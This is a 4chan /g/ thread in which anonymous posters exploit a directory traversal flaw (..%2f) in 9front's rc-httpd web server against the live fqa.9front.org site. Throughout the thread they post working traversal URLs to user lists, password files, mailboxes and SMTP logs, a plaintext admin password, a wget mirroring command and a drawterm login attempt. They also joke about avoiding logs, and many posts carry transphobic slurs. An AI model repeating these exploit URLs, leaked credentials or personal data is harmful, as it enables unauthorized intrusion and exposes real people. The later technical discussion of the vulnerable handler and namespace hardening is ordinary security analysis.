[a / b / c / d / e / f / g / gif / h / hr / k / m / o / p / r / s / t / u / v / vg / vm / vmg / vr / vrpg / vst / w / wg] [i / ic] [r9k / s4s / vip / qa] [cm / hm / lgbt / y] [3 / aco / adv / an / bant / biz / cgl / ck / co / diy / fa / fit / gd / hc / his / int / jp / lit / mlp / mu / n / news / out / po / pol / pw / qst / sci / soc / sp / tg / toy / trv / tv / vp / vt / wsg / wsr / x / xs] [Settings] [Search] [Mobile] [Home]
Board
Settings Mobile Home
/g/ - Technology

[Advertise on 4chan]

Name
Options
Comment
Verification
4chan Pass users can bypass this verification. [Learn More] [Login]
File
  • Please read the Rules and FAQ before posting.
  • You may highlight syntax and preserve whitespace by using [code] tags.
  • There are 61 posters in this thread.

08/21/20New boards added: /vrpg/, /vmg/, /vst/ and /vm/
05/04/17New trial board added: /bant/ - International/Random
10/04/16New board for 4chan Pass users: /vip/ - Very Important Posts
[Hide] [Show All]


[Advertise on 4chan]


File: images (1).jpg (26 KB, 491x624)
26 KB
26 KB JPG
>plan 9/9front is super secure
Oh yeah?
http://fqa.9front.org/..%2f..%2f/
>>
HAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHHAHAHAHAHAHA
TRANNY PROGRAMMING IN A NUTSHELL
PLAN 9 FUCKERS BTFO FOREVER!
>>
>>86286230
What are the implications of this?
>>
>>86286287
It's a known bug from the old days of internet, ..%2f translates to ../
You can access any files on their server, including the ones that should be secret
And 9front trannies managed to fuck up on this
>>
>>86286230
Looked at the homepage, they deserve whatever happens to them.
>>
>http://fqa.9front.org/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/
it goes all the way up
>>
>http://fqa.9front.org/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/sys/lib/tls/acmed/9front.org.cat-v.org.bell-labs.co.key
i can't read their tls key :(
>>
http://fqa.9front.org/..%2f..%2f/etc/users/
>PASSWORDS
HAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAH
>>
>>86286442
Holy shit.
>>
File: 1643863385849-0.gif (492 KB, 500x289)
492 KB
492 KB GIF
TRANNIES FUCKED UP HARD
>TRANNIES FUCKED UP HARD
TRANNIES FUCKED UP HARD
>TRANNIES FUCKED UP HARD
TRANNIES FUCKED UP HARD
>TRANNIES FUCKED UP HARD
TRANNIES FUCKED UP HARD
>TRANNIES FUCKED UP HARD
TRANNIES FUCKED UP HARD
>TRANNIES FUCKED UP HARD
TRANNIES FUCKED UP HARD
>TRANNIES FUCKED UP HARD
>>
>trannies are high iq
>do stupid things
>>
>>86286230
doubt they give a shit
>>
DOWNLOAD DRAWTERM
>drawterm -a 9front.org -h 9front.org -u <one of the users from the passwords>

HOLY SHIT
>>
>>86286230
kek, even my shitty self-written http server doesnt have this problem
>>
damn I'm too tired to do anything here. Have fun guys.
>>
http://fqa.9front.org/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/adm/users
ALL USERS HERE, NO PASSWORD
>>
wget -nd -mkEpnp http://fqa.9front.org/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/
>>
>>86286479
>>drawterm -a 9front.org -h 9front.org -u <one of the users from the passwords>
not working for me
>>
File: 1648253686669.jpg (27 KB, 442x509)
27 KB
27 KB JPG
>>86286230
>http://fqa.9front.org/..%2f..%2f/sites/
uh oh
>>
>>86286506
Maybe its hg passwords, lets keep going!
>>
File: 1647969568817.jpg (8 KB, 250x250)
8 KB
8 KB JPG
>>86286230
>mfw just learned about directory traversal a few days ago
>>
http://fqa.9front.org/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/mail/box/
emails
>>
hg admins:
http://fqa.9front.org/..%2f..%2f/etc/users/admin/members
>uriel
>sl
both have the password: dt1tt13z
>>
>>86286230
gold, fucking awesome
>>
File: intolerant.jpg (14 KB, 1175x100)
14 KB
14 KB JPG
>>86286230
i find this message discriminating
>>
>>86286602
>emails
This appears to be a directory of their public mailing list

>>86286624
Is it possible that the Cat-v boys are having a little April Foolsy at our expense? Uriel is dead. Why would the passwords be plaintext to begin with?

>>86286479 able to use drawterm to login using these passwords, but >>86286506 not being able to is more idicative that this may be an April Foolsy.
>>
http://fqa.9front.org/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/mail/box/cat-v/mbox/

CAT-V MAIL READABLE!
>>
>>86286663
Its still march
>>
>>86286645
you know the weird part is the old website had mein kampf on it
>>
>>86286675
March 31st in Europe. If it is real, did they just shut it down?
>>
>>86286690
>did they just shut it down?
no
>>
>>86286690
no, the webserver probably cant read that file or something
>>
>>86286690
Well, that was fun while it lasted. Another one for some obscure wiki about fringe/niche Unix-related tech long-ago forgotten and internet funnyness.
>>
>>86286690
Still downloading here
>>
>>86286704
the webserver just cant access some files, seems to be newer ones for some reason
>>
>>86286711
Some are pseudo files, like files in /dev, /proc and /net
/net contains addr, which is basically the mac address of the device
Maybe we can open some connections in /net/tcp/clone
>>
>>86286711
>>86286706
Seems so. Wtf is this? How do I skip the /dev directory with the wget flags?
>>
I'm feeling a bit silly wgetting their website
>>
how do you even fuck this up in 2022?
>NIH considered harmful
oh yeah, that's how
>>
try reading user-supplied php
>>
>>86286778
i dont think it uses php
>>
>>86286748
Probably is, 9front is full of these pseudo files
We should look in /sys, /usr, /adm, /mnt/factotum
>>
>>86286778
its plan 9 shell script, no joking
http://fqa.9front.org/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/rc/bin/rc-httpd/
>>
http://fqa.9front.org/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/rc/bin/rc-httpd/select-handler
possible sites hosted on this server
>>
>>86286746
I stopped when the HTML file it was downloading reached 1.6GB. This is a funny thing but I can't mirror their entire higharchy. I hope someone else is archiving this boner.
>>
http://fqa.9front.org/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/usr/sl/
possible admin home directory
Plan 9 uses /usr/ as /home/. Lots of home dirs here
>>
>>86286849
what the fuck is this http://fqa.9front.org/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/usr/sl/TSCM-L06Arch.txt
>>
File: 1622527388274.jpg (58 KB, 429x709)
58 KB
58 KB JPG
>>86286808
wait is their webserver a shell script?
>>
>>86286849
>http://fqa.9front.org/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/usr/sl/

Again, you sure this isn't a joke? Look at http://fqa.9front.org/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/usr/sl/TSCM-L06Arch.txt which is an archived BBS/mbox begining with a post from 2001 about Saddam Hussein. It's a joke, it has to be. I refuse to believe that Cat-v did this by accident. If this is a major mistake, then did it exist for this entire time and we are just noticing it now? What caused OP to find this?
>>
>>86286881
gotta be minimalist
>>
File: 1367850473694.jpg (22 KB, 480x522)
22 KB
22 KB JPG
>tfw other suckless-like websites can be eхploited like that
>>
File: 9multihead.png (250 KB, 1024x681)
250 KB
250 KB PNG
>>86286887
http://fqa.9front.org/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/usr/alex/contrib/9multihead.png

9front - Battlestations
>>
http://fqa.9front.org/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/env/
Environment variables pseudo files
>>
The first good /a/ post on /g/
>>
>>86286887
looking at rc-httpd and werc it doesnt seem to have any protection against it, and it doesnt seem to have any recent commits
>>
>>86286914
N0p
>>
>>86286908
>type '$(touch dicks)' into Super Secure Shell Script Server Site form
>file 'dicks' appears somewhere on disk
>write werc .inc file with shellcode to /usr/sl/www/sites/blahblahblah/dicks.inc
>navigate to dicks.inc
>?????
>get access to a completely useless toy OS running on a tired old pentium 4 in some troon's basement
>>
>>86286929
>bin/contrib/rc-httpd{rc-httpd, handlers/error}: do some minimal sanitization on $SERVER_NAME before handing it off to select-handler. this prevents malformed Host: headers from retrieving arbitrary files from the file system. (thanks, Lightning)
though apparently they did protection in the Host header, but not in the URL?
makes no sense
>>
>>86286887
I have one plan 9 server hosted
Tried rc-http to test tls and one of my friends discovered this. We discovered that only works on static hosting
go to check other sites and noticed that fqa was a static file server, tried this and worked, lol
>>
>>86286230
Lmao plain text passwords.
>>
>>86286934
stop being retarded and add a forward slash at the end
>>
>>86286950
Still N0p
>>
>>86286941
The problem is in static-or-index
first and second line
No sanitization
>>
>>86286962
Only works on static server
Werc is CGI
>>
Got to tired, i need to sleep
Please, keep this thread alive
>>
guys when you finish the downloads can you package it up and share it as a torrent?
>>
What is 9front?
>>
>>86287052
9front is a fork of an old operating system called plan 9 that was developed by rob pike at bell labs
some consider rob pike to be a genius but he is nothing more than giga-steve jobs and king of "different = better" hipster bullshit
>>
http://fqa.9front.org/..%2f..%2f//..%2f..%2f//..%2f..%2f/lib/troll
>>
>>86287052
>>yo dickface, give me an idea for an os
>*drags blunt
>dude, unix, but we rename EVERYTHING
>make nothing make sense, like the shell should be called Acme or some shit
>>woah bro thats like so radical man
>also, dude, like, add network shares and devices files, unix like totally doesnt have those already!
>>woah
>>
>>86287298
This doesn't sound like trannyspeak
>>
http://fqa.9front.org/..%2f..%2f/etc/users/johnny/password
>>86286669
Someone archive this quickly, I want to read it later
>>
All those email addresses in
http://fqa.9front.org/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/sys/log/smtp

Make me think this is not "a joke".
>>
>>86287447
9front is a shitty clone of plan9, which was probably created with the assistance of some kind of downer
>>
>>86286669
Looks like most of this is not readable, except some mail from pre-2016
>>
>>86287509
I've picked out some random email addresses from here and it looks like they're all real.
Not a joke after all.
>>
http://fqa.9front.org/..%2f..%2f/sites/cat-v.org/
What is this?
>>
>http://fqa.9front.org/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/mail/box/cat-v/address-list
>http://fqa.9front.org/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/mail/box/9front/address-list
Looks like there are full address lists of cuck-v mailing lists available
>>
>>86287580
>vienna-manhole.jpg
Do I want to find out?
>>
>This site can’t be reached
THEY BROUGHT IT DOWN
>>
Did anyone download the entire site?
>>
>>86287877
>forgot to use tor
>THEY BROUGHT IT DOWN
welp time to go to jail i guess
>>
>>86287901
For a fuckup in their end? LMAO maybe they should have gotten better at not being massive retards instead of doing a toy barebones O.S. with 0 surface attack.
>>
>>86287877
did anyone archive it?
>>
File: 1648712350186.png (42 KB, 206x273)
42 KB
42 KB PNG
>>
>>86287901
>browsing their website
>go to jail
why?
>>
>>
>>86288016
Come on. Read the topic. No logging the channel, you scum.
>>
>>86288068
ACK!
>>
>>86288016
FUCK you faggot
I hope someone ran wget -r on this shit
>>
>>86288084
i think someone did, he better upload it
>>
>>86288068
You can't say no linking the chat then link the thread fuckface
>>
>>86286230
>>86288016
this is really say alot about trannys getting into data security and wont even bother to scan for url lateral movement or whatever the fuck its called
>>
>>86288589
in the age of today its retarded for any details of the server filesystem to be publicly exposed.
>>
>>86288589
directory traversal anon
>>
>>86288649
the website is literally just serving files from the disk tho
>>
>>86288653
>directory trans-versal
sounds about right
>>
>>86288675
They revealed email address of everyone from their mailing lists.
>>
>>86288649
>>86288653
i bet that its even support redirection so you can just point it to a reverse shell or something
>>
>>86288696
it doesnt
>>
>>86288707
you think or you know? many websites use this function even if they dont need it
>>
>>86286230
Trannyes fucked up really hard
>>
>>86288016
What IRC is that?
>>
It was fun
Kek, and from what i saw, there's no ip log on rc-httpd, since it connects using aux/listen1, so you are safe even if you connected directly

To all 9front viewing this thread:
Better stop experimenting with this shit you call rc-httpd and build a real server, there is ip/httpd/httpd, which seems better but it doesn't have updates from a long time because "muh rc-httpd, shell script server for the lulz"
and also there's lots improvements, like setting the important directory file permissions to 0640 by default, for example, that could have avoided lots of what happened right now. Its really sad one knowing that the of "most active Plan 9 forks out there" doesn't even sanitize url transversal. I agree with you that http should die, but if you are willing to write a server anyway, do it correctly.
>>
>>86290103
also, if you want a mindset, treat like everyone wants to behead you, because it's probably true
>>
i can't access the site. you guys have overloaded their servers gg
>>
>>86290189
They shut down: >>86288016
>>
>>86290103
This. Just write it in Go or something, using the shell to write any sort of complex or reliable program is a meme.
>>
>n fact, it serves the 9front.org and cat-v.org websites, as well as the page you are reading right now.
ohh no
http://openbsd.stanleylieber.com/rc-httpd/
>>
>>86290404
it dosent work
http://openbsd.stanleylieber.com/..%2f..%2f/
>>
>>86290429
it doesn't work because its cgi, the problem affects only static-or-index.
The configuration files looks something like this:
if(~ $SERVER_NAME <server-ip-or-domain>) {
FS_ROOT=<path>
exec <handler>
}

And there's some handlers, cgi, static-or-cgi, static-or-index, etc. The problem is static-or-index, that calls serve-static, and this is what happens on the first lines of it:
full_path=`{echo $"FS_ROOT^$"PATH_INFO | urlencode -d}
full_path=$"full_path
if(~ $full_path */)
error 503
if(test -d $full_path){
redirect perm $"location^'/' \
'URL not quite right, and browser did not accept redirect.'
exit
}
if(! test -e $full_path){
error 404
exit
}
if(! test -r $full_path){
error 503
exit
}

See? No sanitization, it only decodes directly to a path, that transforms ..%2f in ../ and fucks up everything.
>>
bump
>>
I only downloaded a few files, does anyone have anything interesting?
>>
>9front is still down
HAHAHAHAHAHAHAHAH
Nice, well done everyone
>>
>>86292248
maybe they just banned the IPs that conected during that time
>>
>>86292378
I didn't connect until after
>>
>>86292378
No, server is down
IP is unreachable from another IP that i have
>>
>>86290103
>>86292248
you are going to jail
>>
>9front troons constantly monitoring /g/
RENT FREE
>>
>>86292417
>Plan 9 gets shilled for several weeks
>anon on /g/ gets access to their whole website
>They almost instanly notice it by seeing anon's thread
really makes you think
>>
rc-httpd confirmed harmful
NIH confirmed harmful
>>
>>86292416
rc-http works with aux/listen1. translating to unix, its like:
socat tcp-l:80,reuseaddr,fork exec:rc-http

there's no ip logs
>>
File: proxy.duckduckgo.com.png (399 KB, 839x768)
399 KB
399 KB PNG
I dont get it whats 9front
>>
>>86292446
I wonder if this has anything to do with the people who shilled eurasianism and christian communism
>>
>>86292513
9front is a updated version of Plan 9
Plan 9 is a failed "UNIX 2"
>>
>>86292513
a meme tranny os
>>
>>86290516
static-or-cgi handler doesn't call serve-static?
>>
File: 1620650854519.gif (3.18 MB, 720x404)
3.18 MB
3.18 MB GIF
>>86292535
>eurasianism and christian communism
I wasn't on /g/ for some time, did they really shilled this kind of /pol/ here?
>>
>>86292536
I havent visited /g/ regularly in several years
why is it such a big deal that theyre fucking up?
>>
>>86292416
meds glownigger
>>
>>86292499
>there's no ip logs
you are fucking retarded, i really hope you did this via tunneling(if you did)
>>
>>86292569
because they shilled it harder than shitposters shilled Gentoo
>>
>>86292567
I've seen a couple loose eurasianist npcs but it's mostly been confined to /pol/.
>>
>>86292581
what're they gonna do, sue me?
>>
>>86292615
nah they probably won't do shit and try to silence it.
but be careful next time my dude, if you think they dont monitor their servers you are dumb
>>
>>86292567
I think they're trying to disguise it under the guise of technology so the jannies don't just delete their posts.
>>
>>86292693
probably no, actually
there's is a way to monitor and that is enabling the verbose, but since the log is separate from rc-httpd, there's not much a way to see what the ip was doing.

each case, >>86292615.
>>
File: 4.png (120 KB, 802x462)
120 KB
120 KB PNG
Fear not sisters, got you covered!
>>
File: thermal-paste.png (496 KB, 692x1148)
496 KB
496 KB PNG
so /g/ shutdown 9front from the rest of their lives and thats it?
how anticlimatic. someone in their irc to show what they are doing?
>>86292615
>>86292693
>>86292768
i think they can't either:
https://news.ycombinator.com/item?id=25778940
http://code.9front.org/hg/plan9front/log?rev=mein+kampf (now defunct but it had mein kampf)
They are under a pile of accusations of racism, nazism and other shit. If they do try to sue someone, it would be like 4chan trying to sue an anon. They have ips and everything needed to file a sue, but if they do, they are putting themselves in a lot of legal trouble too.
And from where i saw from the developers, at least most of them are anonymous behind a nick. unless they are willing to break anonymity, which probably not because of these accusations, they can't do it.
>>
>>86292996
>They are under a pile of accusations of racism, nazism and other shit.
I thought their website had black lives matters and anti-nazi shit, what happened?
>>
>>86293003
Before that, they had the "4chan humour" style. lots of nazist-german images, fascist and other things to troll the community, and also lots of 4chan references but not directly.
They starting putting those black lives matter and anti-nazism thing to basically counter their past, i suspect that happened after uriel killed himself.
>>
>>86293054
did you see this >>86287262 file?
it was pretty based
>>
>>86293079
no, what was that?
>>
>>86292996
So they ware based all along
>>
>>86293146
>>
>>86293365
>Communism works.
kek'd
>>
>>86293146
here is the full one
https://hastebin.skyra.pw/raw/limuluzofo
>>
>>86293365
>grande literature replaced with some reddit male feminist fagola's whiney diatribe
you hate to see it
>>
came to think about, now even the front fell off. before was plan9front, then 9front and now, without the "frontend", is just 9.
>>
>>86293365
8/10 decent bait
>>
got fixed, apparently.
>>
>>86293596
About time
>>
>>86288696
that vulnerability is called "remote file include", and no, it doesn't always work like that. only retarded languages like PHP have that kind of vulnerability, and usually has nothing to do with path traversal vulns (there are other types of vulns called "local file include" which allow you to do shady stuff with local files).
>>
>>86287087
rob pike is an idiot, but plan 9 is pretty cool.

If it had better drivers (still no hardware accelerated video decode), or even a C++ compiler and modern web browser, I would probably use it as a daily driver because it's very nicely designed.
>>
>>86293608
>Only two remote holes in the default install, in a heck of a long time!
Now 3.
>>
File: 1637051092119.png (16 KB, 889x98)
16 KB
16 KB PNG
>>
File: sigh.png (120 KB, 324x339)
120 KB
120 KB PNG
>>86286230
Who are you quoting?
I don't think anyone who understands how computer security works would think for a second that 9front gives you any more security then run of the mill linux/unix. There is a lack of even ASAN and ASLR. Sure linux and unix are much more complex but they also have people bankrolled by FAANG to find and fix security bugs. It also is quite sad to see that a large majority of this thread has been trying to figure out if the politics of a programming assignment are 'based'. I don't know why I expected the technology board to discuss the actual merits of pieces of tech.
Thanks for posting this I guess, although perhaps next time you can post it to the mailing list like an adult.
>>
>>86292779
>got a free CVE ID from a 4chan thread
congrats, m8! but remember to report it under a pseudonym, because CVE IDs are public.
>>
File: 1642370311903.jpg (341 KB, 1571x780)
341 KB
341 KB JPG
>>86293723
fuck of plantranny
>>
>>86293723
this place is for 14 year old skiddies and 18 year old CS 101 retards to engage in non-stop flamebait, mostly.

I only come here because occasionally (and only very rarely) there's a diamond in the rough.
>>
File: lol.png (29 KB, 720x1280)
29 KB
29 KB PNG
>>86286230
>Payment required
lol wat
>>
>>86293723
i'm not the op
my friend, ..%2f its a decade, maybe 2 decade, old bug. i don't know anything about security, but i know one thing or 2 to not mess up, and you messed up a lot
again, stop messing with rc-httpd, its a cool prototype and concept and all, but not pratical. you were lucky that there was nothing really important or things that was important at least had permissions set, probably because it was automatic.
and please, you are in a fucking plan 9 system, your OWN plan 9 fork. You really didn't think to setup a "container" with file plumbing? What the fuck?
>>
>>86293803
das raycist
>>
>>86293723
when i saw this thread last night i knew one of you cultists were going to eventually come in here and explain how this bug is good, ACTUALLy and that we're the low iq ones
>>
>>86293881
and null pointer bugs are close to 50 years old, doesn't mean that people don't make those mistakes. Not that I think the 'age' of bugs says anything about how easy they are to cause. Every bug is obvious in retrospect.
On your note about the technical details, aux/listen(which is how rc-httpd is run) does automatically switch to the 'none' user as well as reconstructs a standard namespace from scratch. This is why you didn't find "really important" things, like the plan9 /etc/shadow equivalent. It is entirely possible to construct a much more strict namespace, but it can be a bit tricky to carve out specific subtrees from a single root mount. You mention containers, but their modern implementation in something like linux was built from the ground up for the purpose of being a security barrier. Plan9's namespaces are more for convenience and general use. Due to implementation quirks, namespaces are not quite a great way to implement security boundaries. This could be fixed but the code needs to be written.
>>
>>86293790
That's not what it's "for" at all.
>>
>>86293469
>I doubt plan9 will ever get into a usable system. Everything inside is like high-brow silliness, second-system syndrome and stupid vulnerabilities you only meet with in historic code from 30 years ago
>>
File: open genera.png (50 KB, 1149x898)
50 KB
50 KB PNG
>>86293641
>plan9/9front
>I would probably use it as a daily driver because it's very nicely designed
>it's very nicely designed
No.
>>
>>86294313
i could access your $user (by /env/user). It was www, not 'none', and it had access to /net. If somehow i had ways to write, i could host things on your ip. I had access to /net/ether0/addr.
Second, when i mentioned containers, i mentioned mounting your root with one of the file plumbing things to not even have a possibility to access, because you don't know what bugs are in your system like linux devs doesn't know. That's why some static http servers in linux actually chroots to the root of your server files, to not even have any possibility to have access to things, and you could do it with rc-httpd.

>Due to implementation quirks, namespaces are not quite a great way to implement security boundaries
On linux/unix, probably because of the existance of root user, but this shouldn't be an issue on plan 9.
>>
>>86293641
>mouse based
in the garbage it goes
>>
>>86294490
and /adm/users was visible and readable too. Not the passwords but your users and groups. I didn't check the /adm/secstore, but maybe i could access your password hashes for secstore too.
forgot to mention that
>>
>>86294466
it is, i have one server that is running 9front, but the majority of errors was caused by them, not me or anyone on this thread
the permission was set badly and an old NOTABLE bug was discovered and op posted

i'm here now to show them their errors PUBLICLY, so anyone here can see the operating system vulnerabilities.
>>
>>86294490
I think you have me mistaken for the owner of the server you broke in to. I do not own that box, nor do I know how specifically it has been setup. I am simply stating how aux/listen works out of the box.
>Second, when i mentioned containers, i mentioned mounting your root with one of the file plumbing things to not even have a possibility to access
I'm sorry but this is complete gibberish. Perhaps before you go making comments about how the system should work you figure out what a 'file plumbing thing' is. As I mentioned in my post, the namespace that gets used by listen(by default) is the 'standard' namespace which includes /net. /net/ether0/addr is a world readable file, I don't know what you expect. Like I mentioned, it is possible to carve out specific subtrees but its a pain in the ass, clearly this was not something the owner of the server was doing.
>>86294547
Yes /adm/users is world readable as well. Same as with /etc/passwd on unix.Again not sure what you expected.
I am not here to argue with you friend. I realize that this thread may be the first time people hear of 9front. So I wanted to convey how some of this is designed to provide context.
>>
>>86293723
>get fucked by some old trick
>blame unix
files inclusions protection is some really basic stuff woman
>>
>>86294706
sorry, i thought you were, but i will treat you like you are part of the group because they are reading it.
it is readable, but it should had thrown permission denied, even in ..%2f bug, in fact, it shouldn't even have permissions to even access files it doesn't need, at least i don't think it should even had access /net directory or /adm or /proc, plan 9 doesn't have root user but at least it could set read and write permissions to the non-important directory

file plumbing is the "chroot" of plan 9. read srvfs(4). You basically provide the tree and a service name for /srv (or #s, which is basically the same thing). You can isolate processes with this.
>>
>>86294857
I think noting that /adm, /proc and /net having world readable components is worth of discussion, perhaps they shouldn't. See now we're actually talking about some interesting problems.

>file plumbing is the "chroot" of plan 9. read srvfs(4).
This is not correct, if by 'file plumbing' you mean the plumber. The plumber just routes text to different programs depending on regex matches. It is no more integral to the underlying namespace system then ramfs(1) is. /srv or '#s' act as way of 'pinning' a file descriptor for a 9p server to a global registry. For example doing '% ramfs -s mytree' posts to /srv/mytree so that other disjoint namespaces can access it. A somewhat equivalent thing to a typical unix 'chroot' can be established using auth/newns, along with a namespace proto files like /lib/namespace.
At boot your rootfs is posted to /srv/boot, when you create a new namespace from scratch, like with auth/newns. It needs to remount the root. It does this by mounting '#s/boot'. In order to do this, the user that is mounting it needs to be able to read and write to the '#s/boot' file descriptor. What this means is that from a security stand point, anyone with r/w to that /srv file will have world accessible permissions to that entire file tree.

I mentioned 'carving out subtrees' and I think it would help if I described more of what I meant. You could use namespace operations to carve out a very limited view of the rootfs, but /srv is a global registry. Meaning theoretically, as long as you have that r/w permission to '#s/boot' you could just remount the root fs, bypassing the intricately made namespace. Of course in this case this would have been helpful, as you had a way of reading files but not executing code.

For those wondering how to do this in a 100% paranoid way, would be to have a separate rootfs such that it posts to /srv under a different name and run aux/listen from a user without r/w access to /srv/boot. Or use one of the /srv rfork patches.
>>
File: 1648623312663.jpg (21 KB, 300x300)
21 KB
21 KB JPG
hmpf... let's get out of here anons
>>
>>86294466
>sexpr cope machines
literally python-tier brain rot

>>86294511
It's stream based. If you can't figure out how to write key-event bindings in plan 9, that's your own problem. Everything that you need is trivially exposed as file interfaces.

Acme is a massive piece of shit, yes.

>>86294671
>so anyone here can see the operating system vulnerabilities
Not really a plan 9 problem. God knows why they didn't have the webserver running in an isolated namespace.
>>
>>86296163
>>sexpr cope machines
>what is mexpr
>>
>try to be edgy
>bring politics into the discussion
>NOOOO STOP DISCUSSING POLITICS
as expected from 9troons
>>
>>86296969
who are you quoting?
>>
This has been known about for years; it's not a bug.
Being able to access those directories makes perfect sense in this context and the real problem here is a poorly configured namespace.

rc-httpd is run as user 'none' and anything that user can access is basically up for grabs if it exists within the namespace in which rc-httpd is running.

On other operating systems people would regard this as a sanitization issue but that's a band-aid which doesn't solve the real problem here.

Basically, any files in any branches from the root all the way down which are accessible within the namespace were always up for grabs and the real problem is that they existed within the namespace to start with.


I pulled my laptop out at a bar because someone said rc-httpd was exploited and this was a disappointment.
>>
File: cat-smile-1.png (281 KB, 534x590)
281 KB
281 KB PNG
>>86297230
bait
>>
>>86297230
based retardposter
>>
>>86286645
>Opposed to oppressive power structures
>Won't give me root access
Fucking hypocrite trannies
>>
>>86293365
>HURD envy
kek
>>
>>86293469
it says document not found
>>
>>86297230
see >>86294243
>ACKSHUALLY ITS A FEATURE
>>
>>86298837
>it says document not found
https://0x0.st/oq6M.txt
>>
>actual open source infrastructure
is this the future /g/?
>>
The real answer is that this shouldn't have been a problem with namespaces, and yes, this is something Plan 9 objectively does better than UNIX. But using a shell webserver is stupid regardless and I'm not surprised they shot themselves in the foot. UNIX security has come a long ways considering its fundamental flaws, and plugging your ears and pretending you don't need actual security because you're not UNIX will only get you in trouble.

>>86298837
>>86299274
It's literally in the base OS: https://git.9front.org/plan9front/plan9front/5ddff681670a0090cab6486d467399d92dffbef6/lib/troll/f.html
>>
File: urbit-logo.png (17 KB, 680x208)
17 KB
17 KB PNG
>plan9
Obsolete.
>>
>>86299498
useless
>>
>>86299628
>useless
That's plan9.
>>
>>86299701
And urbit
>>
>>86299393
Plan 9 used to be commercial proprietary software.
A few people actually paid money to use it.
>>
>>86299741
plan9 = dead os
>>
>>86299498
urbit is literally just etherum java emacs
>>
>>86299803
>urbit is literally just etherum java emacs
Based?
>>
>>86299793
urbit is literally just a ponzi scheme dressed in javascript faggotry you are ngmi and i wont fall for it
>>
>>86300006
Cryptocoins are a ponzi scheme, there is not much difference between buying an urbit planet, start, galaxy, etc than to buy a internet domain, and urbit is fully open-source and not bloated.





Delete Post: [File Only] Style:
[Disable Mobile View / Use Desktop Site]

[Enable Mobile View / Use Mobile Site]

All trademarks and copyrights on this page are owned by their respective parties. Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.